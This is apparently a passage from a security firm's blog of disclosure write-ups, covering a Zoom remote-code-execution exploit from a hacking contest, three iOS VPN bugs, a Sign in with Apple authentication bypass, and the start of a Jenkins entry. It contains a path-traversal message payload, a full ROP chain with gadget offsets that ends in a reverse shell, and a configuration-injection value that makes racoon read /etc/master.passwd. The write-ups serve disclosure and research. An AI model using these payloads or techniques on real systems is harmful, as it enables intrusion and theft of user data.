  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi 1aWl62KifvJ_LDECBM1" size="4322534"/>
  </giphyv2>
</message>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the address of the stack pointer to point to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 
ret

This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain stats by calling GetModuleHandleW with as argument the string "kernel32.dll" from our GIF file. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp
JMP_GETMODULEHANDLEW,
POP_EBX,
KERNEL32_STR,

ADD_ESP_24,
PUSH_EAX_STACK,
0x41414141,
POP_RET, # Not used, padding for other objects
0x41414141,
0x41414141,
0x41414141,
JMP_GETPROCADDRESS,
JMP_EAX,
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
VIRTUALPROTECT_STR,
SHELLCODE,
SHELLCODE & 0xfffff000,
0x1000,
0x40,
SHELLCODE - 8,
]

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.ddl in one run and then skip the info leak in the next run (the locations of ASLR randomized dlls remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.

Conclusion

After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spend around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

iOS VPN support: 3 different bugs

7 October 2020 at 00:00

Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.

For VPNs there are actually three variants that a Network Extension can implement: a “Personal VPN”, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the code for the VPN itself, either as “Packet Tunnel Provider” or “App Proxy Provider”. we did not spend any time on the latter two, but only investigated Personal VPNs.

To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.

Bug 1: App spoofing

To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:

@interface NEConfiguration : NSObject <NEConfigurationValidating,
			NEProfilePayloadHandlerDelegate, NSCopying, NSSecureCoding> {
    NEVPN * _VPN;
    NEAOVPN * _alwaysOnVPN;
    NEVPNApp * _appVPN;
    NSString * _application;
    NSString * _applicationIdentifier;
    NSString * _applicationName;
    NEContentFilter * _contentFilter;
    NSString * _externalIdentifier;
    long long  _grade;
    NSUUID * _identifier;
    NSString * _name;
    NEPathController * _pathController;
    NEProfileIngestionPayloadInfo * _payloadInfo;
}

It turns out that the permission prompt used that name, instead of the actual name of the app that the user would be familiar with. Because that is part of an object received from the app, this means that it could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could even attempt to obfuscate what the prompt is actually asking. For example, making it seem like a prompt about installing a software update (where users would expect to enter their passcode).

It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.

So, by calling these private methods:

NEVPNManager *manager = [NEVPNManager sharedManager];
...
NEConfiguration *configuration = [manager configuration];

[configuration setApplication:nil];
[configuration setApplicationName:@"New Network Settings for 4G"];

[manager saveToPreferencesWithCompletionHandler:^(NSError *error) {
    ...
}];

This results in the following permission prompt:

And this configuration is not automatically removed when uninstalling the app.

Apple fixed this issue in the iOS 14 update.

Bug 2: Configuration file injection (CVE-2020-9836)

IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:

Important Note

The development of ipsec-tools has been ABANDONED.

ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!

Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.

While playing around with the configuration options, we noticed a strange error whenever we included a " character in the “Group name” or “Account Name” values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.

Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.

One interesting option that did work was the following:

A"; my_identifier keyid file "/etc/master.passwd

This results in the following line in the configuration file:

	my_identifier keyid_use "A"; my_identifier keyid file "/etc/master.passwd";

This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:

Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:

  • /var/root/Library/
  • /private/etc/
  • /Library/Preferences/

There is, however, an important limitation. The group name is added to the initial handshake message. This packet is sent over UDP, therefore, the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any files larger than 65,535 bytes, subtracting the overhead for the rest of the packet, IP and UDP header, can not be read.

For example, following files were found to often be below the limit and may sensitive information that would normally not be available to an app:

  • /Library/Preferences/SystemConfiguration/com.apple.wifi.plist
  • /private/var/root/Library/Lockdown/data_ark.plist

By exploiting this issue, a Network Extension app could read from files that would normally not be allowed due to the app sandbox. Other potential impact could be accessing Keychain items or deleting files on those directories by changing the pid file location.

Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.

Bug 3: OOB reads (CVE-2020-9837)

As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era even being used for a jailbreak), but likely because there is no upstream project, these fixes were often not correct or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.

A common pattern in racoon for parsing packets containing a list of elements is to do the following. The start of the list is cast to a struct with the same representation as the element header (d). A variable keeps track of the remaining length of the buffer (tlen). Then, a loop is started. In each iteration, it handles the current element. Then it advances the struct to the next value and it decreases the number of remaining bytes with the size of the current element. If that number becomes negative or zero, the loop ends.

For example, ipsec_doi.c:534-772:

534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
/*
 * get ISAKMP data attributes
 */
static int
t2isakmpsa(trns, sa)
	struct isakmp_pl_t *trns;
	struct isakmpsa *sa;
{
	struct isakmp_data *d, *prev;
	int flag, type;
	int error = -1;
	int life_t;
	int keylen = 0;
	vchar_t *val = NULL;
	int len, tlen;
	u_char *p;

	tlen = ntohs(trns->h.len) - sizeof(*trns);
	prev = (struct isakmp_data *)NULL;
	d = (struct isakmp_data *)(trns + 1);

	/* default */
	life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
	sa->lifetime = OAKLEY_ATTR_SA_LD_SEC_DEFAULT;
	sa->lifebyte = 0;
	sa->dhgrp = racoon_calloc(1, sizeof(struct dhgroup));
	if (!sa->dhgrp)
		goto err;

	while (tlen > 0) {

		type = ntohs(d->type) & ~ISAKMP_GEN_MASK;
		flag = ntohs(d->type) & ISAKMP_GEN_MASK;

		plog(ASL_LEVEL_DEBUG, 
			"type=%s, flag=0x%04x, lorv=%s\n",
			s_oakley_attr(type), flag,
			s_oakley_attr_v(type, ntohs(d->lorv)));

		/* get variable-sized item */
		switch (type) {
		case OAKLEY_ATTR_GRP_PI:
		case OAKLEY_ATTR_GRP_GEN_ONE:
		case OAKLEY_ATTR_GRP_GEN_TWO:
		case OAKLEY_ATTR_GRP_CURVE_A:
		case OAKLEY_ATTR_GRP_CURVE_B:
		case OAKLEY_ATTR_SA_LD:
		case OAKLEY_ATTR_GRP_ORDER:
			if (flag) {	/*TV*/
				len = 2;
				p = (u_char *)&d->lorv;
			} else {	/*TLV*/
				len = ntohs(d->lorv);
				if (len > tlen) {
					plog(ASL_LEVEL_ERR, 
						 "invalid ISAKMP-SA attr, attr-len %d, overall-len %d\n",
						 len, tlen);
					return -1;
				}
				p = (u_char *)(d + 1);
			}
			val = vmalloc(len);
			if (!val)
				return -1;
			memcpy(val->v, p, len);
			break;

		default:
			break;
		}

		switch (type) {
		case OAKLEY_ATTR_ENC_ALG:
			sa->enctype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_HASH_ALG:
			sa->hashtype = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_AUTH_METHOD:
			sa->authmethod = ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_DESC:
			sa->dh_group = (u_int16_t)ntohs(d->lorv);
			break;

		case OAKLEY_ATTR_GRP_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			if (type == OAKLEY_ATTR_GRP_TYPE_MODP)
				sa->dhgrp->type = type;
			else
				return -1;
			break;
		}
		case OAKLEY_ATTR_GRP_PI:
			sa->dhgrp->prime = val;
			break;

		case OAKLEY_ATTR_GRP_GEN_ONE:
			vfree(val);
			if (!flag)
				sa->dhgrp->gen1 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen1 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen1, d + 1, len);
				sa->dhgrp->gen1 = ntohl(sa->dhgrp->gen1);
			}
			break;

		case OAKLEY_ATTR_GRP_GEN_TWO:
			vfree(val);
			if (!flag)
				sa->dhgrp->gen2 = ntohs(d->lorv);
			else {
				int len = ntohs(d->lorv);
				sa->dhgrp->gen2 = 0;
				if (len > 4)
					return -1;
				memcpy(&sa->dhgrp->gen2, d + 1, len);
				sa->dhgrp->gen2 = ntohl(sa->dhgrp->gen2);
			}
			break;

		case OAKLEY_ATTR_GRP_CURVE_A:
			sa->dhgrp->curve_a = val;
			break;

		case OAKLEY_ATTR_GRP_CURVE_B:
			sa->dhgrp->curve_b = val;
			break;

		case OAKLEY_ATTR_SA_LD_TYPE:
		{
			int type = (int)ntohs(d->lorv);
			switch (type) {
			case OAKLEY_ATTR_SA_LD_TYPE_SEC:
			case OAKLEY_ATTR_SA_LD_TYPE_KB:
				life_t = type;
				break;
			default:
				life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
				break;
			}
			break;
		}
		case OAKLEY_ATTR_SA_LD:
			if (!prev
			 || (ntohs(prev->type) & ~ISAKMP_GEN_MASK) !=
					OAKLEY_ATTR_SA_LD_TYPE) {
				plog(ASL_LEVEL_ERR, 
				    "life duration must follow ltype\n");
				break;
			}

			switch (life_t) {
			case IPSECDOI_ATTR_SA_LD_TYPE_SEC:
				sa->lifetime = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifetime == 0) {
					plog(ASL_LEVEL_ERR, 
						"invalid life duration.\n");
					goto err;
				}
				break;
			case IPSECDOI_ATTR_SA_LD_TYPE_KB:
				sa->lifebyte = ipsecdoi_set_ld(val);
				vfree(val);
				if (sa->lifebyte == 0) {
					plog(ASL_LEVEL_ERR, 
						"invalid life duration.\n");
					goto err;
				}
				break;
			default:
				vfree(val);
				plog(ASL_LEVEL_ERR, 
					"invalid life type: %d\n", life_t);
				goto err;
			}
			break;

		case OAKLEY_ATTR_KEY_LEN:
		{
			int len = ntohs(d->lorv);
			if (len % 8 != 0) {
				plog(ASL_LEVEL_ERR, 
					"keylen %d: not multiple of 8\n",
					len);
				goto err;
			}
			sa->encklen = (u_int16_t)len;
			keylen++;
			break;
		}
		case OAKLEY_ATTR_PRF:
		case OAKLEY_ATTR_FIELD_SIZE:
			/* unsupported */
			break;

		case OAKLEY_ATTR_GRP_ORDER:
			sa->dhgrp->order = val;
			break;

		default:
			break;
		}

		prev = d;
		if (flag) {
			tlen -= sizeof(*d);
			d = (struct isakmp_data *)((char *)d + sizeof(*d));
		} else {
			tlen -= (sizeof(*d) + ntohs(d->lorv));
			d = (struct isakmp_data *)((char *)d + sizeof(*d) + ntohs(d->lorv));
		}
	}

	/* key length must not be specified on some algorithms */
	if (keylen) {
		if (sa->enctype == OAKLEY_ATTR_ENC_ALG_DES
		 || sa->enctype == OAKLEY_ATTR_ENC_ALG_3DES) {
			plog(ASL_LEVEL_ERR, 
				"keylen must not be specified "
				"for encryption algorithm %d\n",
				sa->enctype);
			return -1;
		}
	}

	return 0;
err:
	return error;
}

In 9 places in the code this pattern was used without a check at the start of the loop body that the remainder of the list contained at least the number of bytes that the header is long, nor was there a check that after the parsing the number of remaining bytes was exactly 0. This means that for the last iteration of the loop, the struct may contain fields that are filled with data past the end of the buffer.

In some cases where variable length elements are used, the check if the buffer had enough data for the variable length part was also slightly off, also due to failing to take into account the length of the header of the current packet. In the example above, on line 587 the code checks that len > tlen, but this fails to take into account the fact that the size of the header the element has not yet been subtracted from tlen (as can be seen at line 753).

The end result was that in many places where packets are being parsed it was possible to read a couple of additional bytes from the buffer as if they are part of the packet. In many cases, it was possible to observe information about those bytes externally. For example, depending on the element type, the connection might be aborted if an OOB byte was 0x00.

These were fixed by Apple in iOS 13.5 (CVE-2020-9837).

Conclusion

VPNs are intended to offer security for users on an untrusted network. However, with the introduction of Network Extensions, the OS now also needs to protect itself against a potentially malicious VPN app. Properly securing an existing feature for such a new context is difficult. This is even more difficult due to the use of an existing, but abandoned, project. The way racoon is written, C code with complicated pointer arithmetic, makes spotting these bugs very difficult. It is very likely that more memory corruption bugs can be found in it.

Sign in with Apple - authentication bypass

1 July 2020 at 00:00

A couple of weeks ago we found a vulnerability that could be used to gain unauthorized access to an iCloud account, by abusing a new feature allowing TouchID to log in to websites.

In iOS 13 and macOS 10.15, Apple added the possibility to sign in on Apple’s own sites using TouchID/FaceID in Safari on devices which include the required biometric hardware.

When you visit any page with a login form for an Apple-account, a prompt is shown to authenticate using TouchID instead. If you authenticate, you’re immediately logged in. This skips the 2-factor authentication step you would normally need to perform when logging in with your password. This makes sense because the process can be considered to already require two factors: your biometrics and the device. You can cancel the prompt to log in normally, for example if you want to use a different AppleID than the one signed in on the phone.

We expect that the primary use-case of this feature is not for signing in on iCloud (as it is pretty rare to use icloud.com in Safari on a phone), but we expect that the main motivator was for “Sign in with Apple” on the web, for which this feature works as well. For those sites additional options are shown when creating a new account, for example whether to hide your email address.

Although all of this works in both macOS and iOS, with TouchID and FaceID and for all sites using AppleID logins, we’ll use iOS, TouchID and https://icloud.com to explain the vulnerability, but keep in mind that the impact is more broad.

Logging in on Apple domains happens using OAuth2. On https://icloud.com, this uses the web_message mode. This works as follows when doing a normal login:

  1. https://icloud.com embeds an iframe pointing to https://idmsa.apple.com/appleauth/auth/authorize/signin?client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d &redirect_uri=https%3A%2F%2Fwww.icloud.com&response_mode=web_message &response_type=code.
  2. The user logs in (including steps such as entering a 2FA-token) inside the iframe.
  3. If the authentication succeeds, the iframe posts a message back to the parent window with a grant_code for the user using window.parent.postMessage(<token>, "https://icloud.com") in JavaScript.
  4. The grant_code is used by the icloud.com page to continue the login process.

Two of the parameters are very important in the iframe URL: the client_id and redirect_uri. The idmsa.apple.com server keeps track of a list of registered clients and the redirect URIs that are allowed for each client. In the case of the web_message flow, the redirect URI is not used as a real redirect, but instead it is used as the required page origin of the posted message with the grant code (the second argument for postMessage).

For all OAuth2 modes, it is very important that the authentication server validates the redirect URI correctly. If it does not do that, then the user’s grant_code could be sent to a malicious webpage instead. When logging in on the website, idmsa.apple.com performs that check correctly: changing the redirect_uri to anything else results in an error page.

When the user authenticates using TouchID, the iframe is handled differently, but the outer page remains the same. When Safari detects a new page with a URL matching the example URL above, it does not download the page, but it invokes the process AKAppSSOExtension instead. This process communicates with the AuthKit daemon (akd) to handle the biometric authentication and to retrieve a grant_code. If the user successfully authenticates then Safari injects a fake response to the pending iframe request which posts the message back, in the same way that the normal page would do if the authentication had succeeded. akd communicates with an API on gsa.apple.com, to which it sends the details of the request and from which it receives a grant_code.

What we found was that the gsa.apple.com API had a bug: even though the client_id and redirect_uri were included in the data submitted to it by akd, it did not check that the redirect URI matches the client ID. Instead, there was only a whitelist applied by AKAppSSOExtension on the domains. All domains ending with apple.com, icloud.com and icloud.com.cn were allowed. That may sound secure enough, but keep in mind that apple.com has hundreds (if not thousands) of subdomains. If any of these subdomains can somehow be tricked into running malicious JavaScript then they could be used to trigger the prompt for a login with the iCloud client_id, allowing that script to retrieve the user’s grant code if they authenticate. Then the page can send it back to an attacker which can use it to obtain a session on icloud.com.

Some examples of how that could happen:

  • A cross-site scripting vulnerability on any subdomain. These are found quite regularly, https://support.apple.com/en-us/HT201536 lists at least 30 candidates from 2019, and that just covers the domains that are important enough to investigate.
  • A dangling subdomain that can be taken over by an attacker. While we are not aware of any instances of this happening to Apple, recently someone found 670 subdomains of microsoft.com available for takeover: https://nakedsecurity.sophos.com/2020/03/06/researcher-finds-670-microsoft-subdomains-vulnerable-to-takeover/
  • A user visiting a page on any subdomain over HTTP. The important subdomains will have a HSTS header, but many will not. The domain apple.com is not HSTS preloaded with includeSubdomains.

The first two require the attacker to trick users into visiting the malicious page. The third requires that the attacker has access to the user’s local network. While such an attack is in general harder, it does allow a very interesting example: captive.apple.com. When an Apple device connects to a wifi-network, it will try to access http://captive.apple.com/hotspot-detect.html. If the response does not match the usual response, then the system assumes there is a captive portal where the user will need to do something first. To allow the user to do that, the response page is opened and shown. Usually, this redirects the user to another page where they need to login, accept terms and conditions, pay, etc. However, it does not need to do that. Instead, the page could embed JavaScript which triggers the TouchID login, which will be allowed as it is on an apple.com subdomain. If the user authenticates, then the malicious JavaScript receives the user’s grant_code.

The page could include all sorts of content to make the user more likely to authenticate, for example by making the page look like it is part of iOS itself or a “Sign in with Apple” button. “Sign in with Apple” is still pretty new, so user’s might not notice that the prompt is slightly different than usual. Besides, many users will probably automatically authenticate when they see a TouchID prompt as those are almost always about them authenticating to the phone, the fact that users should also determine if they want to authenticate to the page which opened the prompt is not made obvious.

By setting up a fake hotspot in a location where users expect to receive a captive portal (for example at an airport, hotel or train station), it would have been possible to gain access to a significant number of iCloud accounts, which would have allowed access to backups of pictures, location of the phone, files and much more. As I mentioned, this also bypasses the normal 2FA approve + 6-digit code step.

We reported this vulnerability to Apple, and they fixed it the same day they triaged it. The gsa.apple.com API now correctly checks that the redirect_uri matches the client_id. Therefore, this could be fixed entirely server-side.

It makes a lot of sense to us how this vulnerability could have been missed: people testing this will probably have focused on using untrusted domains for the redirect_uri. For example, sometimes it works to use https://www.icloud.com.attacker.com or https://attacker.com/https://www.icloud.com. In this case those both fail, however, by trying just those you would miss the ability to use a malicious subdomain.

The video below illustrates the vulnerability.

Jenkins - authentication bypass

30 January 2020 at 00:00

During a short review of the Jenkins source code, we found a vulnerability that can be used to bypass the mutual authentication when using the JNLP3 remoting protocol. In particular, this allows anyone to impersonate a client and thereby gain access to the information and functionality that should only be available to that client.

Technical Background

